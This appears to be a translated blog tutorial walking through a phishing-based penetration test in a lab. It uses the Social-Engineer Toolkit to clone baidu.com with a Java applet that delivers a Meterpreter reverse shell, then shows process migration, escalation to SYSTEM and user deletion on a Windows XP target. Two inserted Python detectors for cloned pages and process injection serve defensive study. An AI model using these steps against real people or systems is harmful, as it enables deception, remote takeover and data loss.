Building a Phishing Site for Penetration Testing: The SET Toolkit on an Internal Network

The web attack vectors in the SET toolkit can clone a page that looks identical to the real, trusted site, so that the victim believes they are browsing a legitimate site.

This example uses the Java Applet attack vector to deceive the user.
The specific steps are as follows.

Run setoolkit to launch the SET toolkit:


          _______________________________
         /   _____/\_   _____/\__    ___/
         \_____  \  |    __)_   |    |
         /        \ |        \  |    |
        /_______  //_______  /  |____|
                \/         \/            

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


urllib.error.URLError: <urlopen error [Errno 111] Connection refused>
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 2
....
The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

set:webattack>1
...
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]:  

[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.

Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com

[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: XvOnfJKEK
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

  Name:                                       Description:

   1) Meterpreter Memory Injection (DEFAULT)  This will drop a meterpreter payload through powershell injection
   2) Meterpreter Multi-Memory Injection      This will drop multiple Metasploit payloads via powershell injection
   3) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
   4) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
   5) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
   6) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec
   7) Import your own executable              Specify a path for your own executable
   8) Import your own commands.txt            Specify payloads to be sent via command line

set:payloads>1
set:payloads> PORT of the listener [443]:

Select the payload you want to deliver via shellcode injection

   1) Windows Meterpreter Reverse TCP
   2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
   4) Windows Meterpreter (ALL PORTS) Reverse TCP

set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[!] ERROR:Something is running on port 80. Attempting to see if we can stop Apache...
[!] Apache may be running, do you want SET to stop the process? [y/n]: y
[*] Attempting to stop apache.. One moment..
Stopping apache2 (via systemctl): apache2.service.
[*] Success! Apache was stopped. Moving forward within SET...
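The page SET has just prepared is a clone of the real site with an applet element injected into it. As an added, defender-side example that is not part of the original post, the following Python scanner flags two traits of such a page: a Java applet/object element, and a page served from a bare IP address whose links point at a brand's own domain. The sample HTML and every name in it are constructed for illustration, not SET's real template.

```python
import re
from html.parser import HTMLParser

# Constructed sample fragment in the style of a cloned page with an applet
# element injected into it (hypothetical file names, not SET's real template).
SAMPLE_HTML = """<html><head><title>Search</title>
<link rel="icon" href="https://www.baidu.com/favicon.ico"></head>
<body><form action="https://www.baidu.com/s"><input name="wd"></form>
<applet code="Update.class" archive="Update.jar" width="1" height="1">
<param name="1" value="http://192.168.1.113/XvOnfJKEK"></applet>
</body></html>"""


class CloneScanner(HTMLParser):
    """Collects applet-like elements and every hostname the page references."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("applet", "embed", "object"):
            self.applets.append((tag, a))
        for v in a.values():
            m = re.match(r"https?://([^/:]+)", v or "")
            if m:
                self.hosts.add(m.group(1).lower())


def scan(html, served_from):
    """Return a list of findings for a page fetched from host `served_from`."""
    p = CloneScanner()
    p.feed(html)
    findings = []
    for tag, a in p.applets:
        # <applet> is always Java; <object>/<embed> only when typed as such
        if tag == "applet" or "java" in (a.get("type") or "").lower():
            findings.append(f"java {tag} element: archive={a.get('archive')} code={a.get('code')}")
    foreign = p.hosts - {served_from}
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", served_from) and foreign:
        findings.append(f"served from bare IP {served_from} but references {sorted(foreign)}")
    return findings
```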

Connect to the page at 192.168.1.113:443 from another target machine. The Baidu page is displayed, and a session appears on the attacker host; entering the session gives control of the target. The process is as follows:

msf6 exploit(multi/handler) > 
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.115:1133) at 2021-06-22 20:58:38 +0800


msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/wind  WINXP-1\st21 @ WINXP-  192.168.1.113:443 ->
            ows                   1                      192.168.1.115:1133 (1
                                                         92.168.1.115)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > 

After obtaining meterpreter access, carry out further privilege escalation and other operations (first migrate the process, then switch users):

meterpreter > run post/windows/manage/migrate

[*] Running module against WINXP-1
[*] Current server process: SpVcICIXanGOf.exe (3028)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2432
[+] Successfully migrated into process 2432
meterpreter > getpid
Current pid: 2432
meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > uuid
[+] UUID: 918ed6d2b1ecf640/x86=1/windows=1/2021-06-22T12:58:36Z
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3512 created.
Channel 2 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\st21>net user
net user

\\WINXP-1 的用户帐户

-------------------------------------------------------------------------------
__wfilterd_user          Administrator            Guest                    
hack                     HelpAssistant            st21                     
SUPPORT_388945a0         
命令成功完成。


C:\Documents and Settings\st21>net user hack /del
net user hack /del
命令成功完成。


C:\Documents and Settings\st21>net user
net user

\\WINXP-1 的用户帐户

-------------------------------------------------------------------------------
__wfilterd_user          Administrator            Guest                    
HelpAssistant            st21                     SUPPORT_388945a0         
命令成功完成。


C:\Documents and Settings\st21>
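The migration into notepad.exe and the callback to the listener shown above leave traces a host sensor can see. As an added example that is not from the original post, this Python snippet correlates constructed Sysmon-style records (event 1 process creation, event 8 CreateRemoteThread, event 3 network connection; field names are simplified and every value is made up to mirror the session above) and flags a process spawned from a temp directory, a cross-image remote thread, and a network connection from a process that should never open sockets.

```python
NOTEPAD = r"C:\WINDOWS\system32\notepad.exe"
# Constructed dropper path mirroring the random name SET printed above.
DROPPER = r"C:\DOCUME~1\st21\LOCALS~1\Temp\SpVcICIXanGOf.exe"

# Constructed Sysmon-style records (simplified fields, made-up values).
EVENTS = [
    {"id": 1, "pid": 2432, "image": NOTEPAD, "parent_pid": 3028, "parent_image": DROPPER},
    {"id": 8, "source_pid": 3028, "source_image": DROPPER,
     "target_pid": 2432, "target_image": NOTEPAD},
    {"id": 3, "pid": 2432, "image": NOTEPAD, "dest_ip": "192.168.1.113", "dest_port": 443},
    # A browser fetching the cloned page is expected traffic and must not alert.
    {"id": 3, "pid": 1200, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "dest_ip": "192.168.1.113", "dest_port": 80},
]

# Hypothetical starter list of binaries that have no business opening sockets.
NO_NETWORK = {"notepad.exe", "calc.exe", "mspaint.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (alert_type, detail) tuples in event order. PIDs that received a
    remote thread are remembered so later network activity from them is
    attributed to the injecting image."""
    injected = {}
    alerts = []
    for e in events:
        if e["id"] == 1 and "\\temp\\" in e["parent_image"].lower():
            alerts.append(("temp_parent", f'{e["image"]} spawned by {e["parent_image"]}'))
        elif e["id"] == 8 and basename(e["source_image"]) != basename(e["target_image"]):
            injected[e["target_pid"]] = e["source_image"]
            alerts.append(("remote_thread", f'{e["source_image"]} -> {e["target_image"]}'))
        elif e["id"] == 3:
            src = injected.get(e["pid"])
            if src is not None or basename(e["image"]) in NO_NETWORK:
                detail = f'{e["image"]} (pid {e["pid"]}) -> {e["dest_ip"]}:{e["dest_port"]}'
                if src:
                    detail += f" after injection by {src}"
                alerts.append(("unexpected_network", detail))
    return alerts
```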

This article has briefly introduced using the web attack vectors of the SET toolkit to forge a web page for phishing-based penetration testing; it is for learning purposes only.

Origin blog.csdn.net/qq_19623861/article/details/118116595